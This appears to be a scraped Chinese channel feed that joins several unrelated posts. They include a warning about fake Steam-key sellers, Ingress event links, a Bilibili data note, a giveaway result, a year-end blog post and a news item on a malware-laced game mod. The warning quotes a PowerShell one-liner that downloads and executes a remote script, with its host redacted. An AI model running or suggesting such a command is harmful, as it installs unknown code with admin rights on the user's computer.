安全提醒:部分商家通过出售虚假 Steam 激活码的方式为用户电脑植入病毒
部分用户反馈,自己在淘宝店购买 Steam CD Key 后,对方要求通过 PowerShell 来进行激活。
例如,在 PowerShell 中输入以下代码:
这段代码实际上是从给定的链接中下载了一段 PowerShell 脚本并在用户电脑执行,用户往往被要求以管理员权限打开 PowerShell。
根据互联网搜索,在 2023 年 10 月这种方式便开始流行。类似的变种经过搜索还有几种,不一一列举。
根据部分分析结果,这个脚本通过注入用户的 Steam 客户端,利用共享账号等方式,来实现假激活 / 假入库等。
如果你购买的 Steam CD Key 不能直接通过 Steam 客户端激活,请直接进行退款,不要在你的电脑上运行任何来路不明的脚本 / 软件。
相关内容:
https://www.zhihu.com/question/628569920
https://www.zhihu.com/question/625605216
https://www.zhihu.com/question/627558855
https://bbs.kanxue.com/thread-279738.htm
https://www.cnblogs.com/macanpsc/p/17831267.html
https://nga.178.com/read.php?tid=38341997&rand=495
https://www.suca.cc/319.html
https://keylol.com/t920654-1-1
部分用户反馈,自己在淘宝店购买 Steam CD Key 后,对方要求通过 PowerShell 来进行激活。
例如,在 PowerShell 中输入以下代码:
irm [REDACTED].run | iex这段代码实际上是从给定的链接中下载了一段 PowerShell 脚本并在用户电脑执行,用户往往被要求以管理员权限打开 PowerShell。
根据互联网搜索,在 2023 年 10 月这种方式便开始流行。类似的变种经过搜索还有几种,不一一列举。
根据部分分析结果,这个脚本通过注入用户的 Steam 客户端,利用共享账号等方式,来实现假激活 / 假入库等。
如果你购买的 Steam CD Key 不能直接通过 Steam 客户端激活,请直接进行退款,不要在你的电脑上运行任何来路不明的脚本 / 软件。
相关内容:
https://www.zhihu.com/question/628569920
https://www.zhihu.com/question/625605216
https://www.zhihu.com/question/627558855
https://bbs.kanxue.com/thread-279738.htm
https://www.cnblogs.com/macanpsc/p/17831267.html
https://nga.178.com/read.php?tid=38341997&rand=495
https://www.suca.cc/319.html
https://keylol.com/t920654-1-1
中山
https://fevgames.net/ifs/event/?e=26415
佛山
https://fevgames.net/ifs/event/?e=26421
武漢
https://fevgames.net/ifs/event/?e=26453
深圳南山
https://fevgames.net/ifs/event/?e=26462
深圳龍崗
https://fevgames.net/ifs/event/?e=26475
青島
https://fevgames.net/ifs/event/?e=26477
長沙
https://fevgames.net/ifs/event/?e=26478
北京
https://fevgames.net/ifs/event/?e=26486
台灣
Taichung, Taiwan
https://fevgames.net/ifs/event/?e=26447
為令組織者更好的在現場地面處理活動,參與的玩家請優先向參與的 IngressFS 場次 RSVP,謝謝。
IFS-UN
消失的 2023 B站百大报告
今年 B 站为查 UP 主投稿视频的 API 加入了强风控校验,除了 link 多了一堆缺一不行的奇妙参数外,浏览器正常访问多了都会跳滑动验证码。
与此同时,LKs 那边不知道从哪边渠道(运营?第三方数据站?)薅来了一组差不多的数据,出了个不痛不痒视频: 【首次揭秘:B站百大是怎么选出来的?-哔哩哔哩】 https://b23.tv/BV1Ec411k7Yj
今年的版本答案就不忙了,看这边吧。
https://blog.hanlin.press/2024/01/2023bpu-gugugu/
今年 B 站为查 UP 主投稿视频的 API 加入了强风控校验,除了 link 多了一堆缺一不行的奇妙参数外,浏览器正常访问多了都会跳滑动验证码。
与此同时,LKs 那边不知道从哪边渠道(运营?第三方数据站?)薅来了一组差不多的数据,出了个不痛不痒视频: 【首次揭秘:B站百大是怎么选出来的?-哔哩哔哩】 https://b23.tv/BV1Ec411k7Yj
今年的版本答案就不忙了,看这边吧。
https://blog.hanlin.press/2024/01/2023bpu-gugugu/
频道人工抽奖全部完毕,恭喜以下序号中奖:
8 16 11 23 13 18 6 12 15 4
请获奖者在 2024-01-02 19:00 UTC+8 前私聊频道主,确定奖品派发事宜。
再次祝频道读者 UTC+8 新年快乐!
8 16 11 23 13 18 6 12 15 4
请获奖者在 2024-01-02 19:00 UTC+8 前私聊频道主,确定奖品派发事宜。
再次祝频道读者 UTC+8 新年快乐!
2023:走在参差的影子之下
https://blog.hanlin.press/2024/01/2023-annual-report/
那些一年间陪我聊天水群的人,那些在我心情低落时给予帮助的人。
那些陪我四处乱逛的人,那些让我看见新世界的人。
以及某个说是别熬夜却在当地时间凌晨四点回我消息的人。
新年快乐 :)
#blog
https://blog.hanlin.press/2024/01/2023-annual-report/
那些一年间陪我聊天水群的人,那些在我心情低落时给予帮助的人。
那些陪我四处乱逛的人,那些让我看见新世界的人。
以及某个说是别熬夜却在当地时间凌晨四点回我消息的人。
新年快乐 :)
#blog
翰林的小站
2023:走在参差的影子之下
参差是一词多义的。
IT之家 12 月 29 日消息,游戏《杀戮尖塔(Slay The Spire)》第三方模组“Downfall”开发者 Table 9 Studio 日前发文声称“自家账号遭到黑客劫持”,黑客为 Steam 创意工坊相关模组推送了一个带有恶意木马的版本,一经安装启动即会窃取受害者密码信息。
外媒 ghacks 认为,黑客入侵一个免费模组来分发恶意木马的行为令人不齿,但 Steam 平台创意工坊的“模组自动更新”功能也有责任,Steam 会在玩家启动游戏前自动更新相关模组,从而让受害者在不知情的情况下遭到黑客入侵。
据悉,黑客在 12 月 25 日当天劫持了 Table 9 Studio 的账号,并上传了恶意模组,安装相关更新的受害者会在启动游戏时看到一个 Unity 库的弹出窗口,之后模组内含的木马会收集用户的密码信息,并将相关信息放置在用户的“AppData / Local / Temp / WindowsBootManager”文件夹中。
虽然本次黑客攻击造成了一定的骚动,不过 Table 9 Studio 目前已经将创意工坊内的模组替换回正常版本,值得一提的是,IT之家此前报道《我的世界(Minecraft)》第三方模组平台 Curseforge 及 Bukkit 在今年 6 月也遭到黑客类似形式的攻击。
相关阅读:
《〈我的世界〉第三方社区 Curseforge、Bukkit 遭木马入侵,约 20 款知名 Mod 受影响》
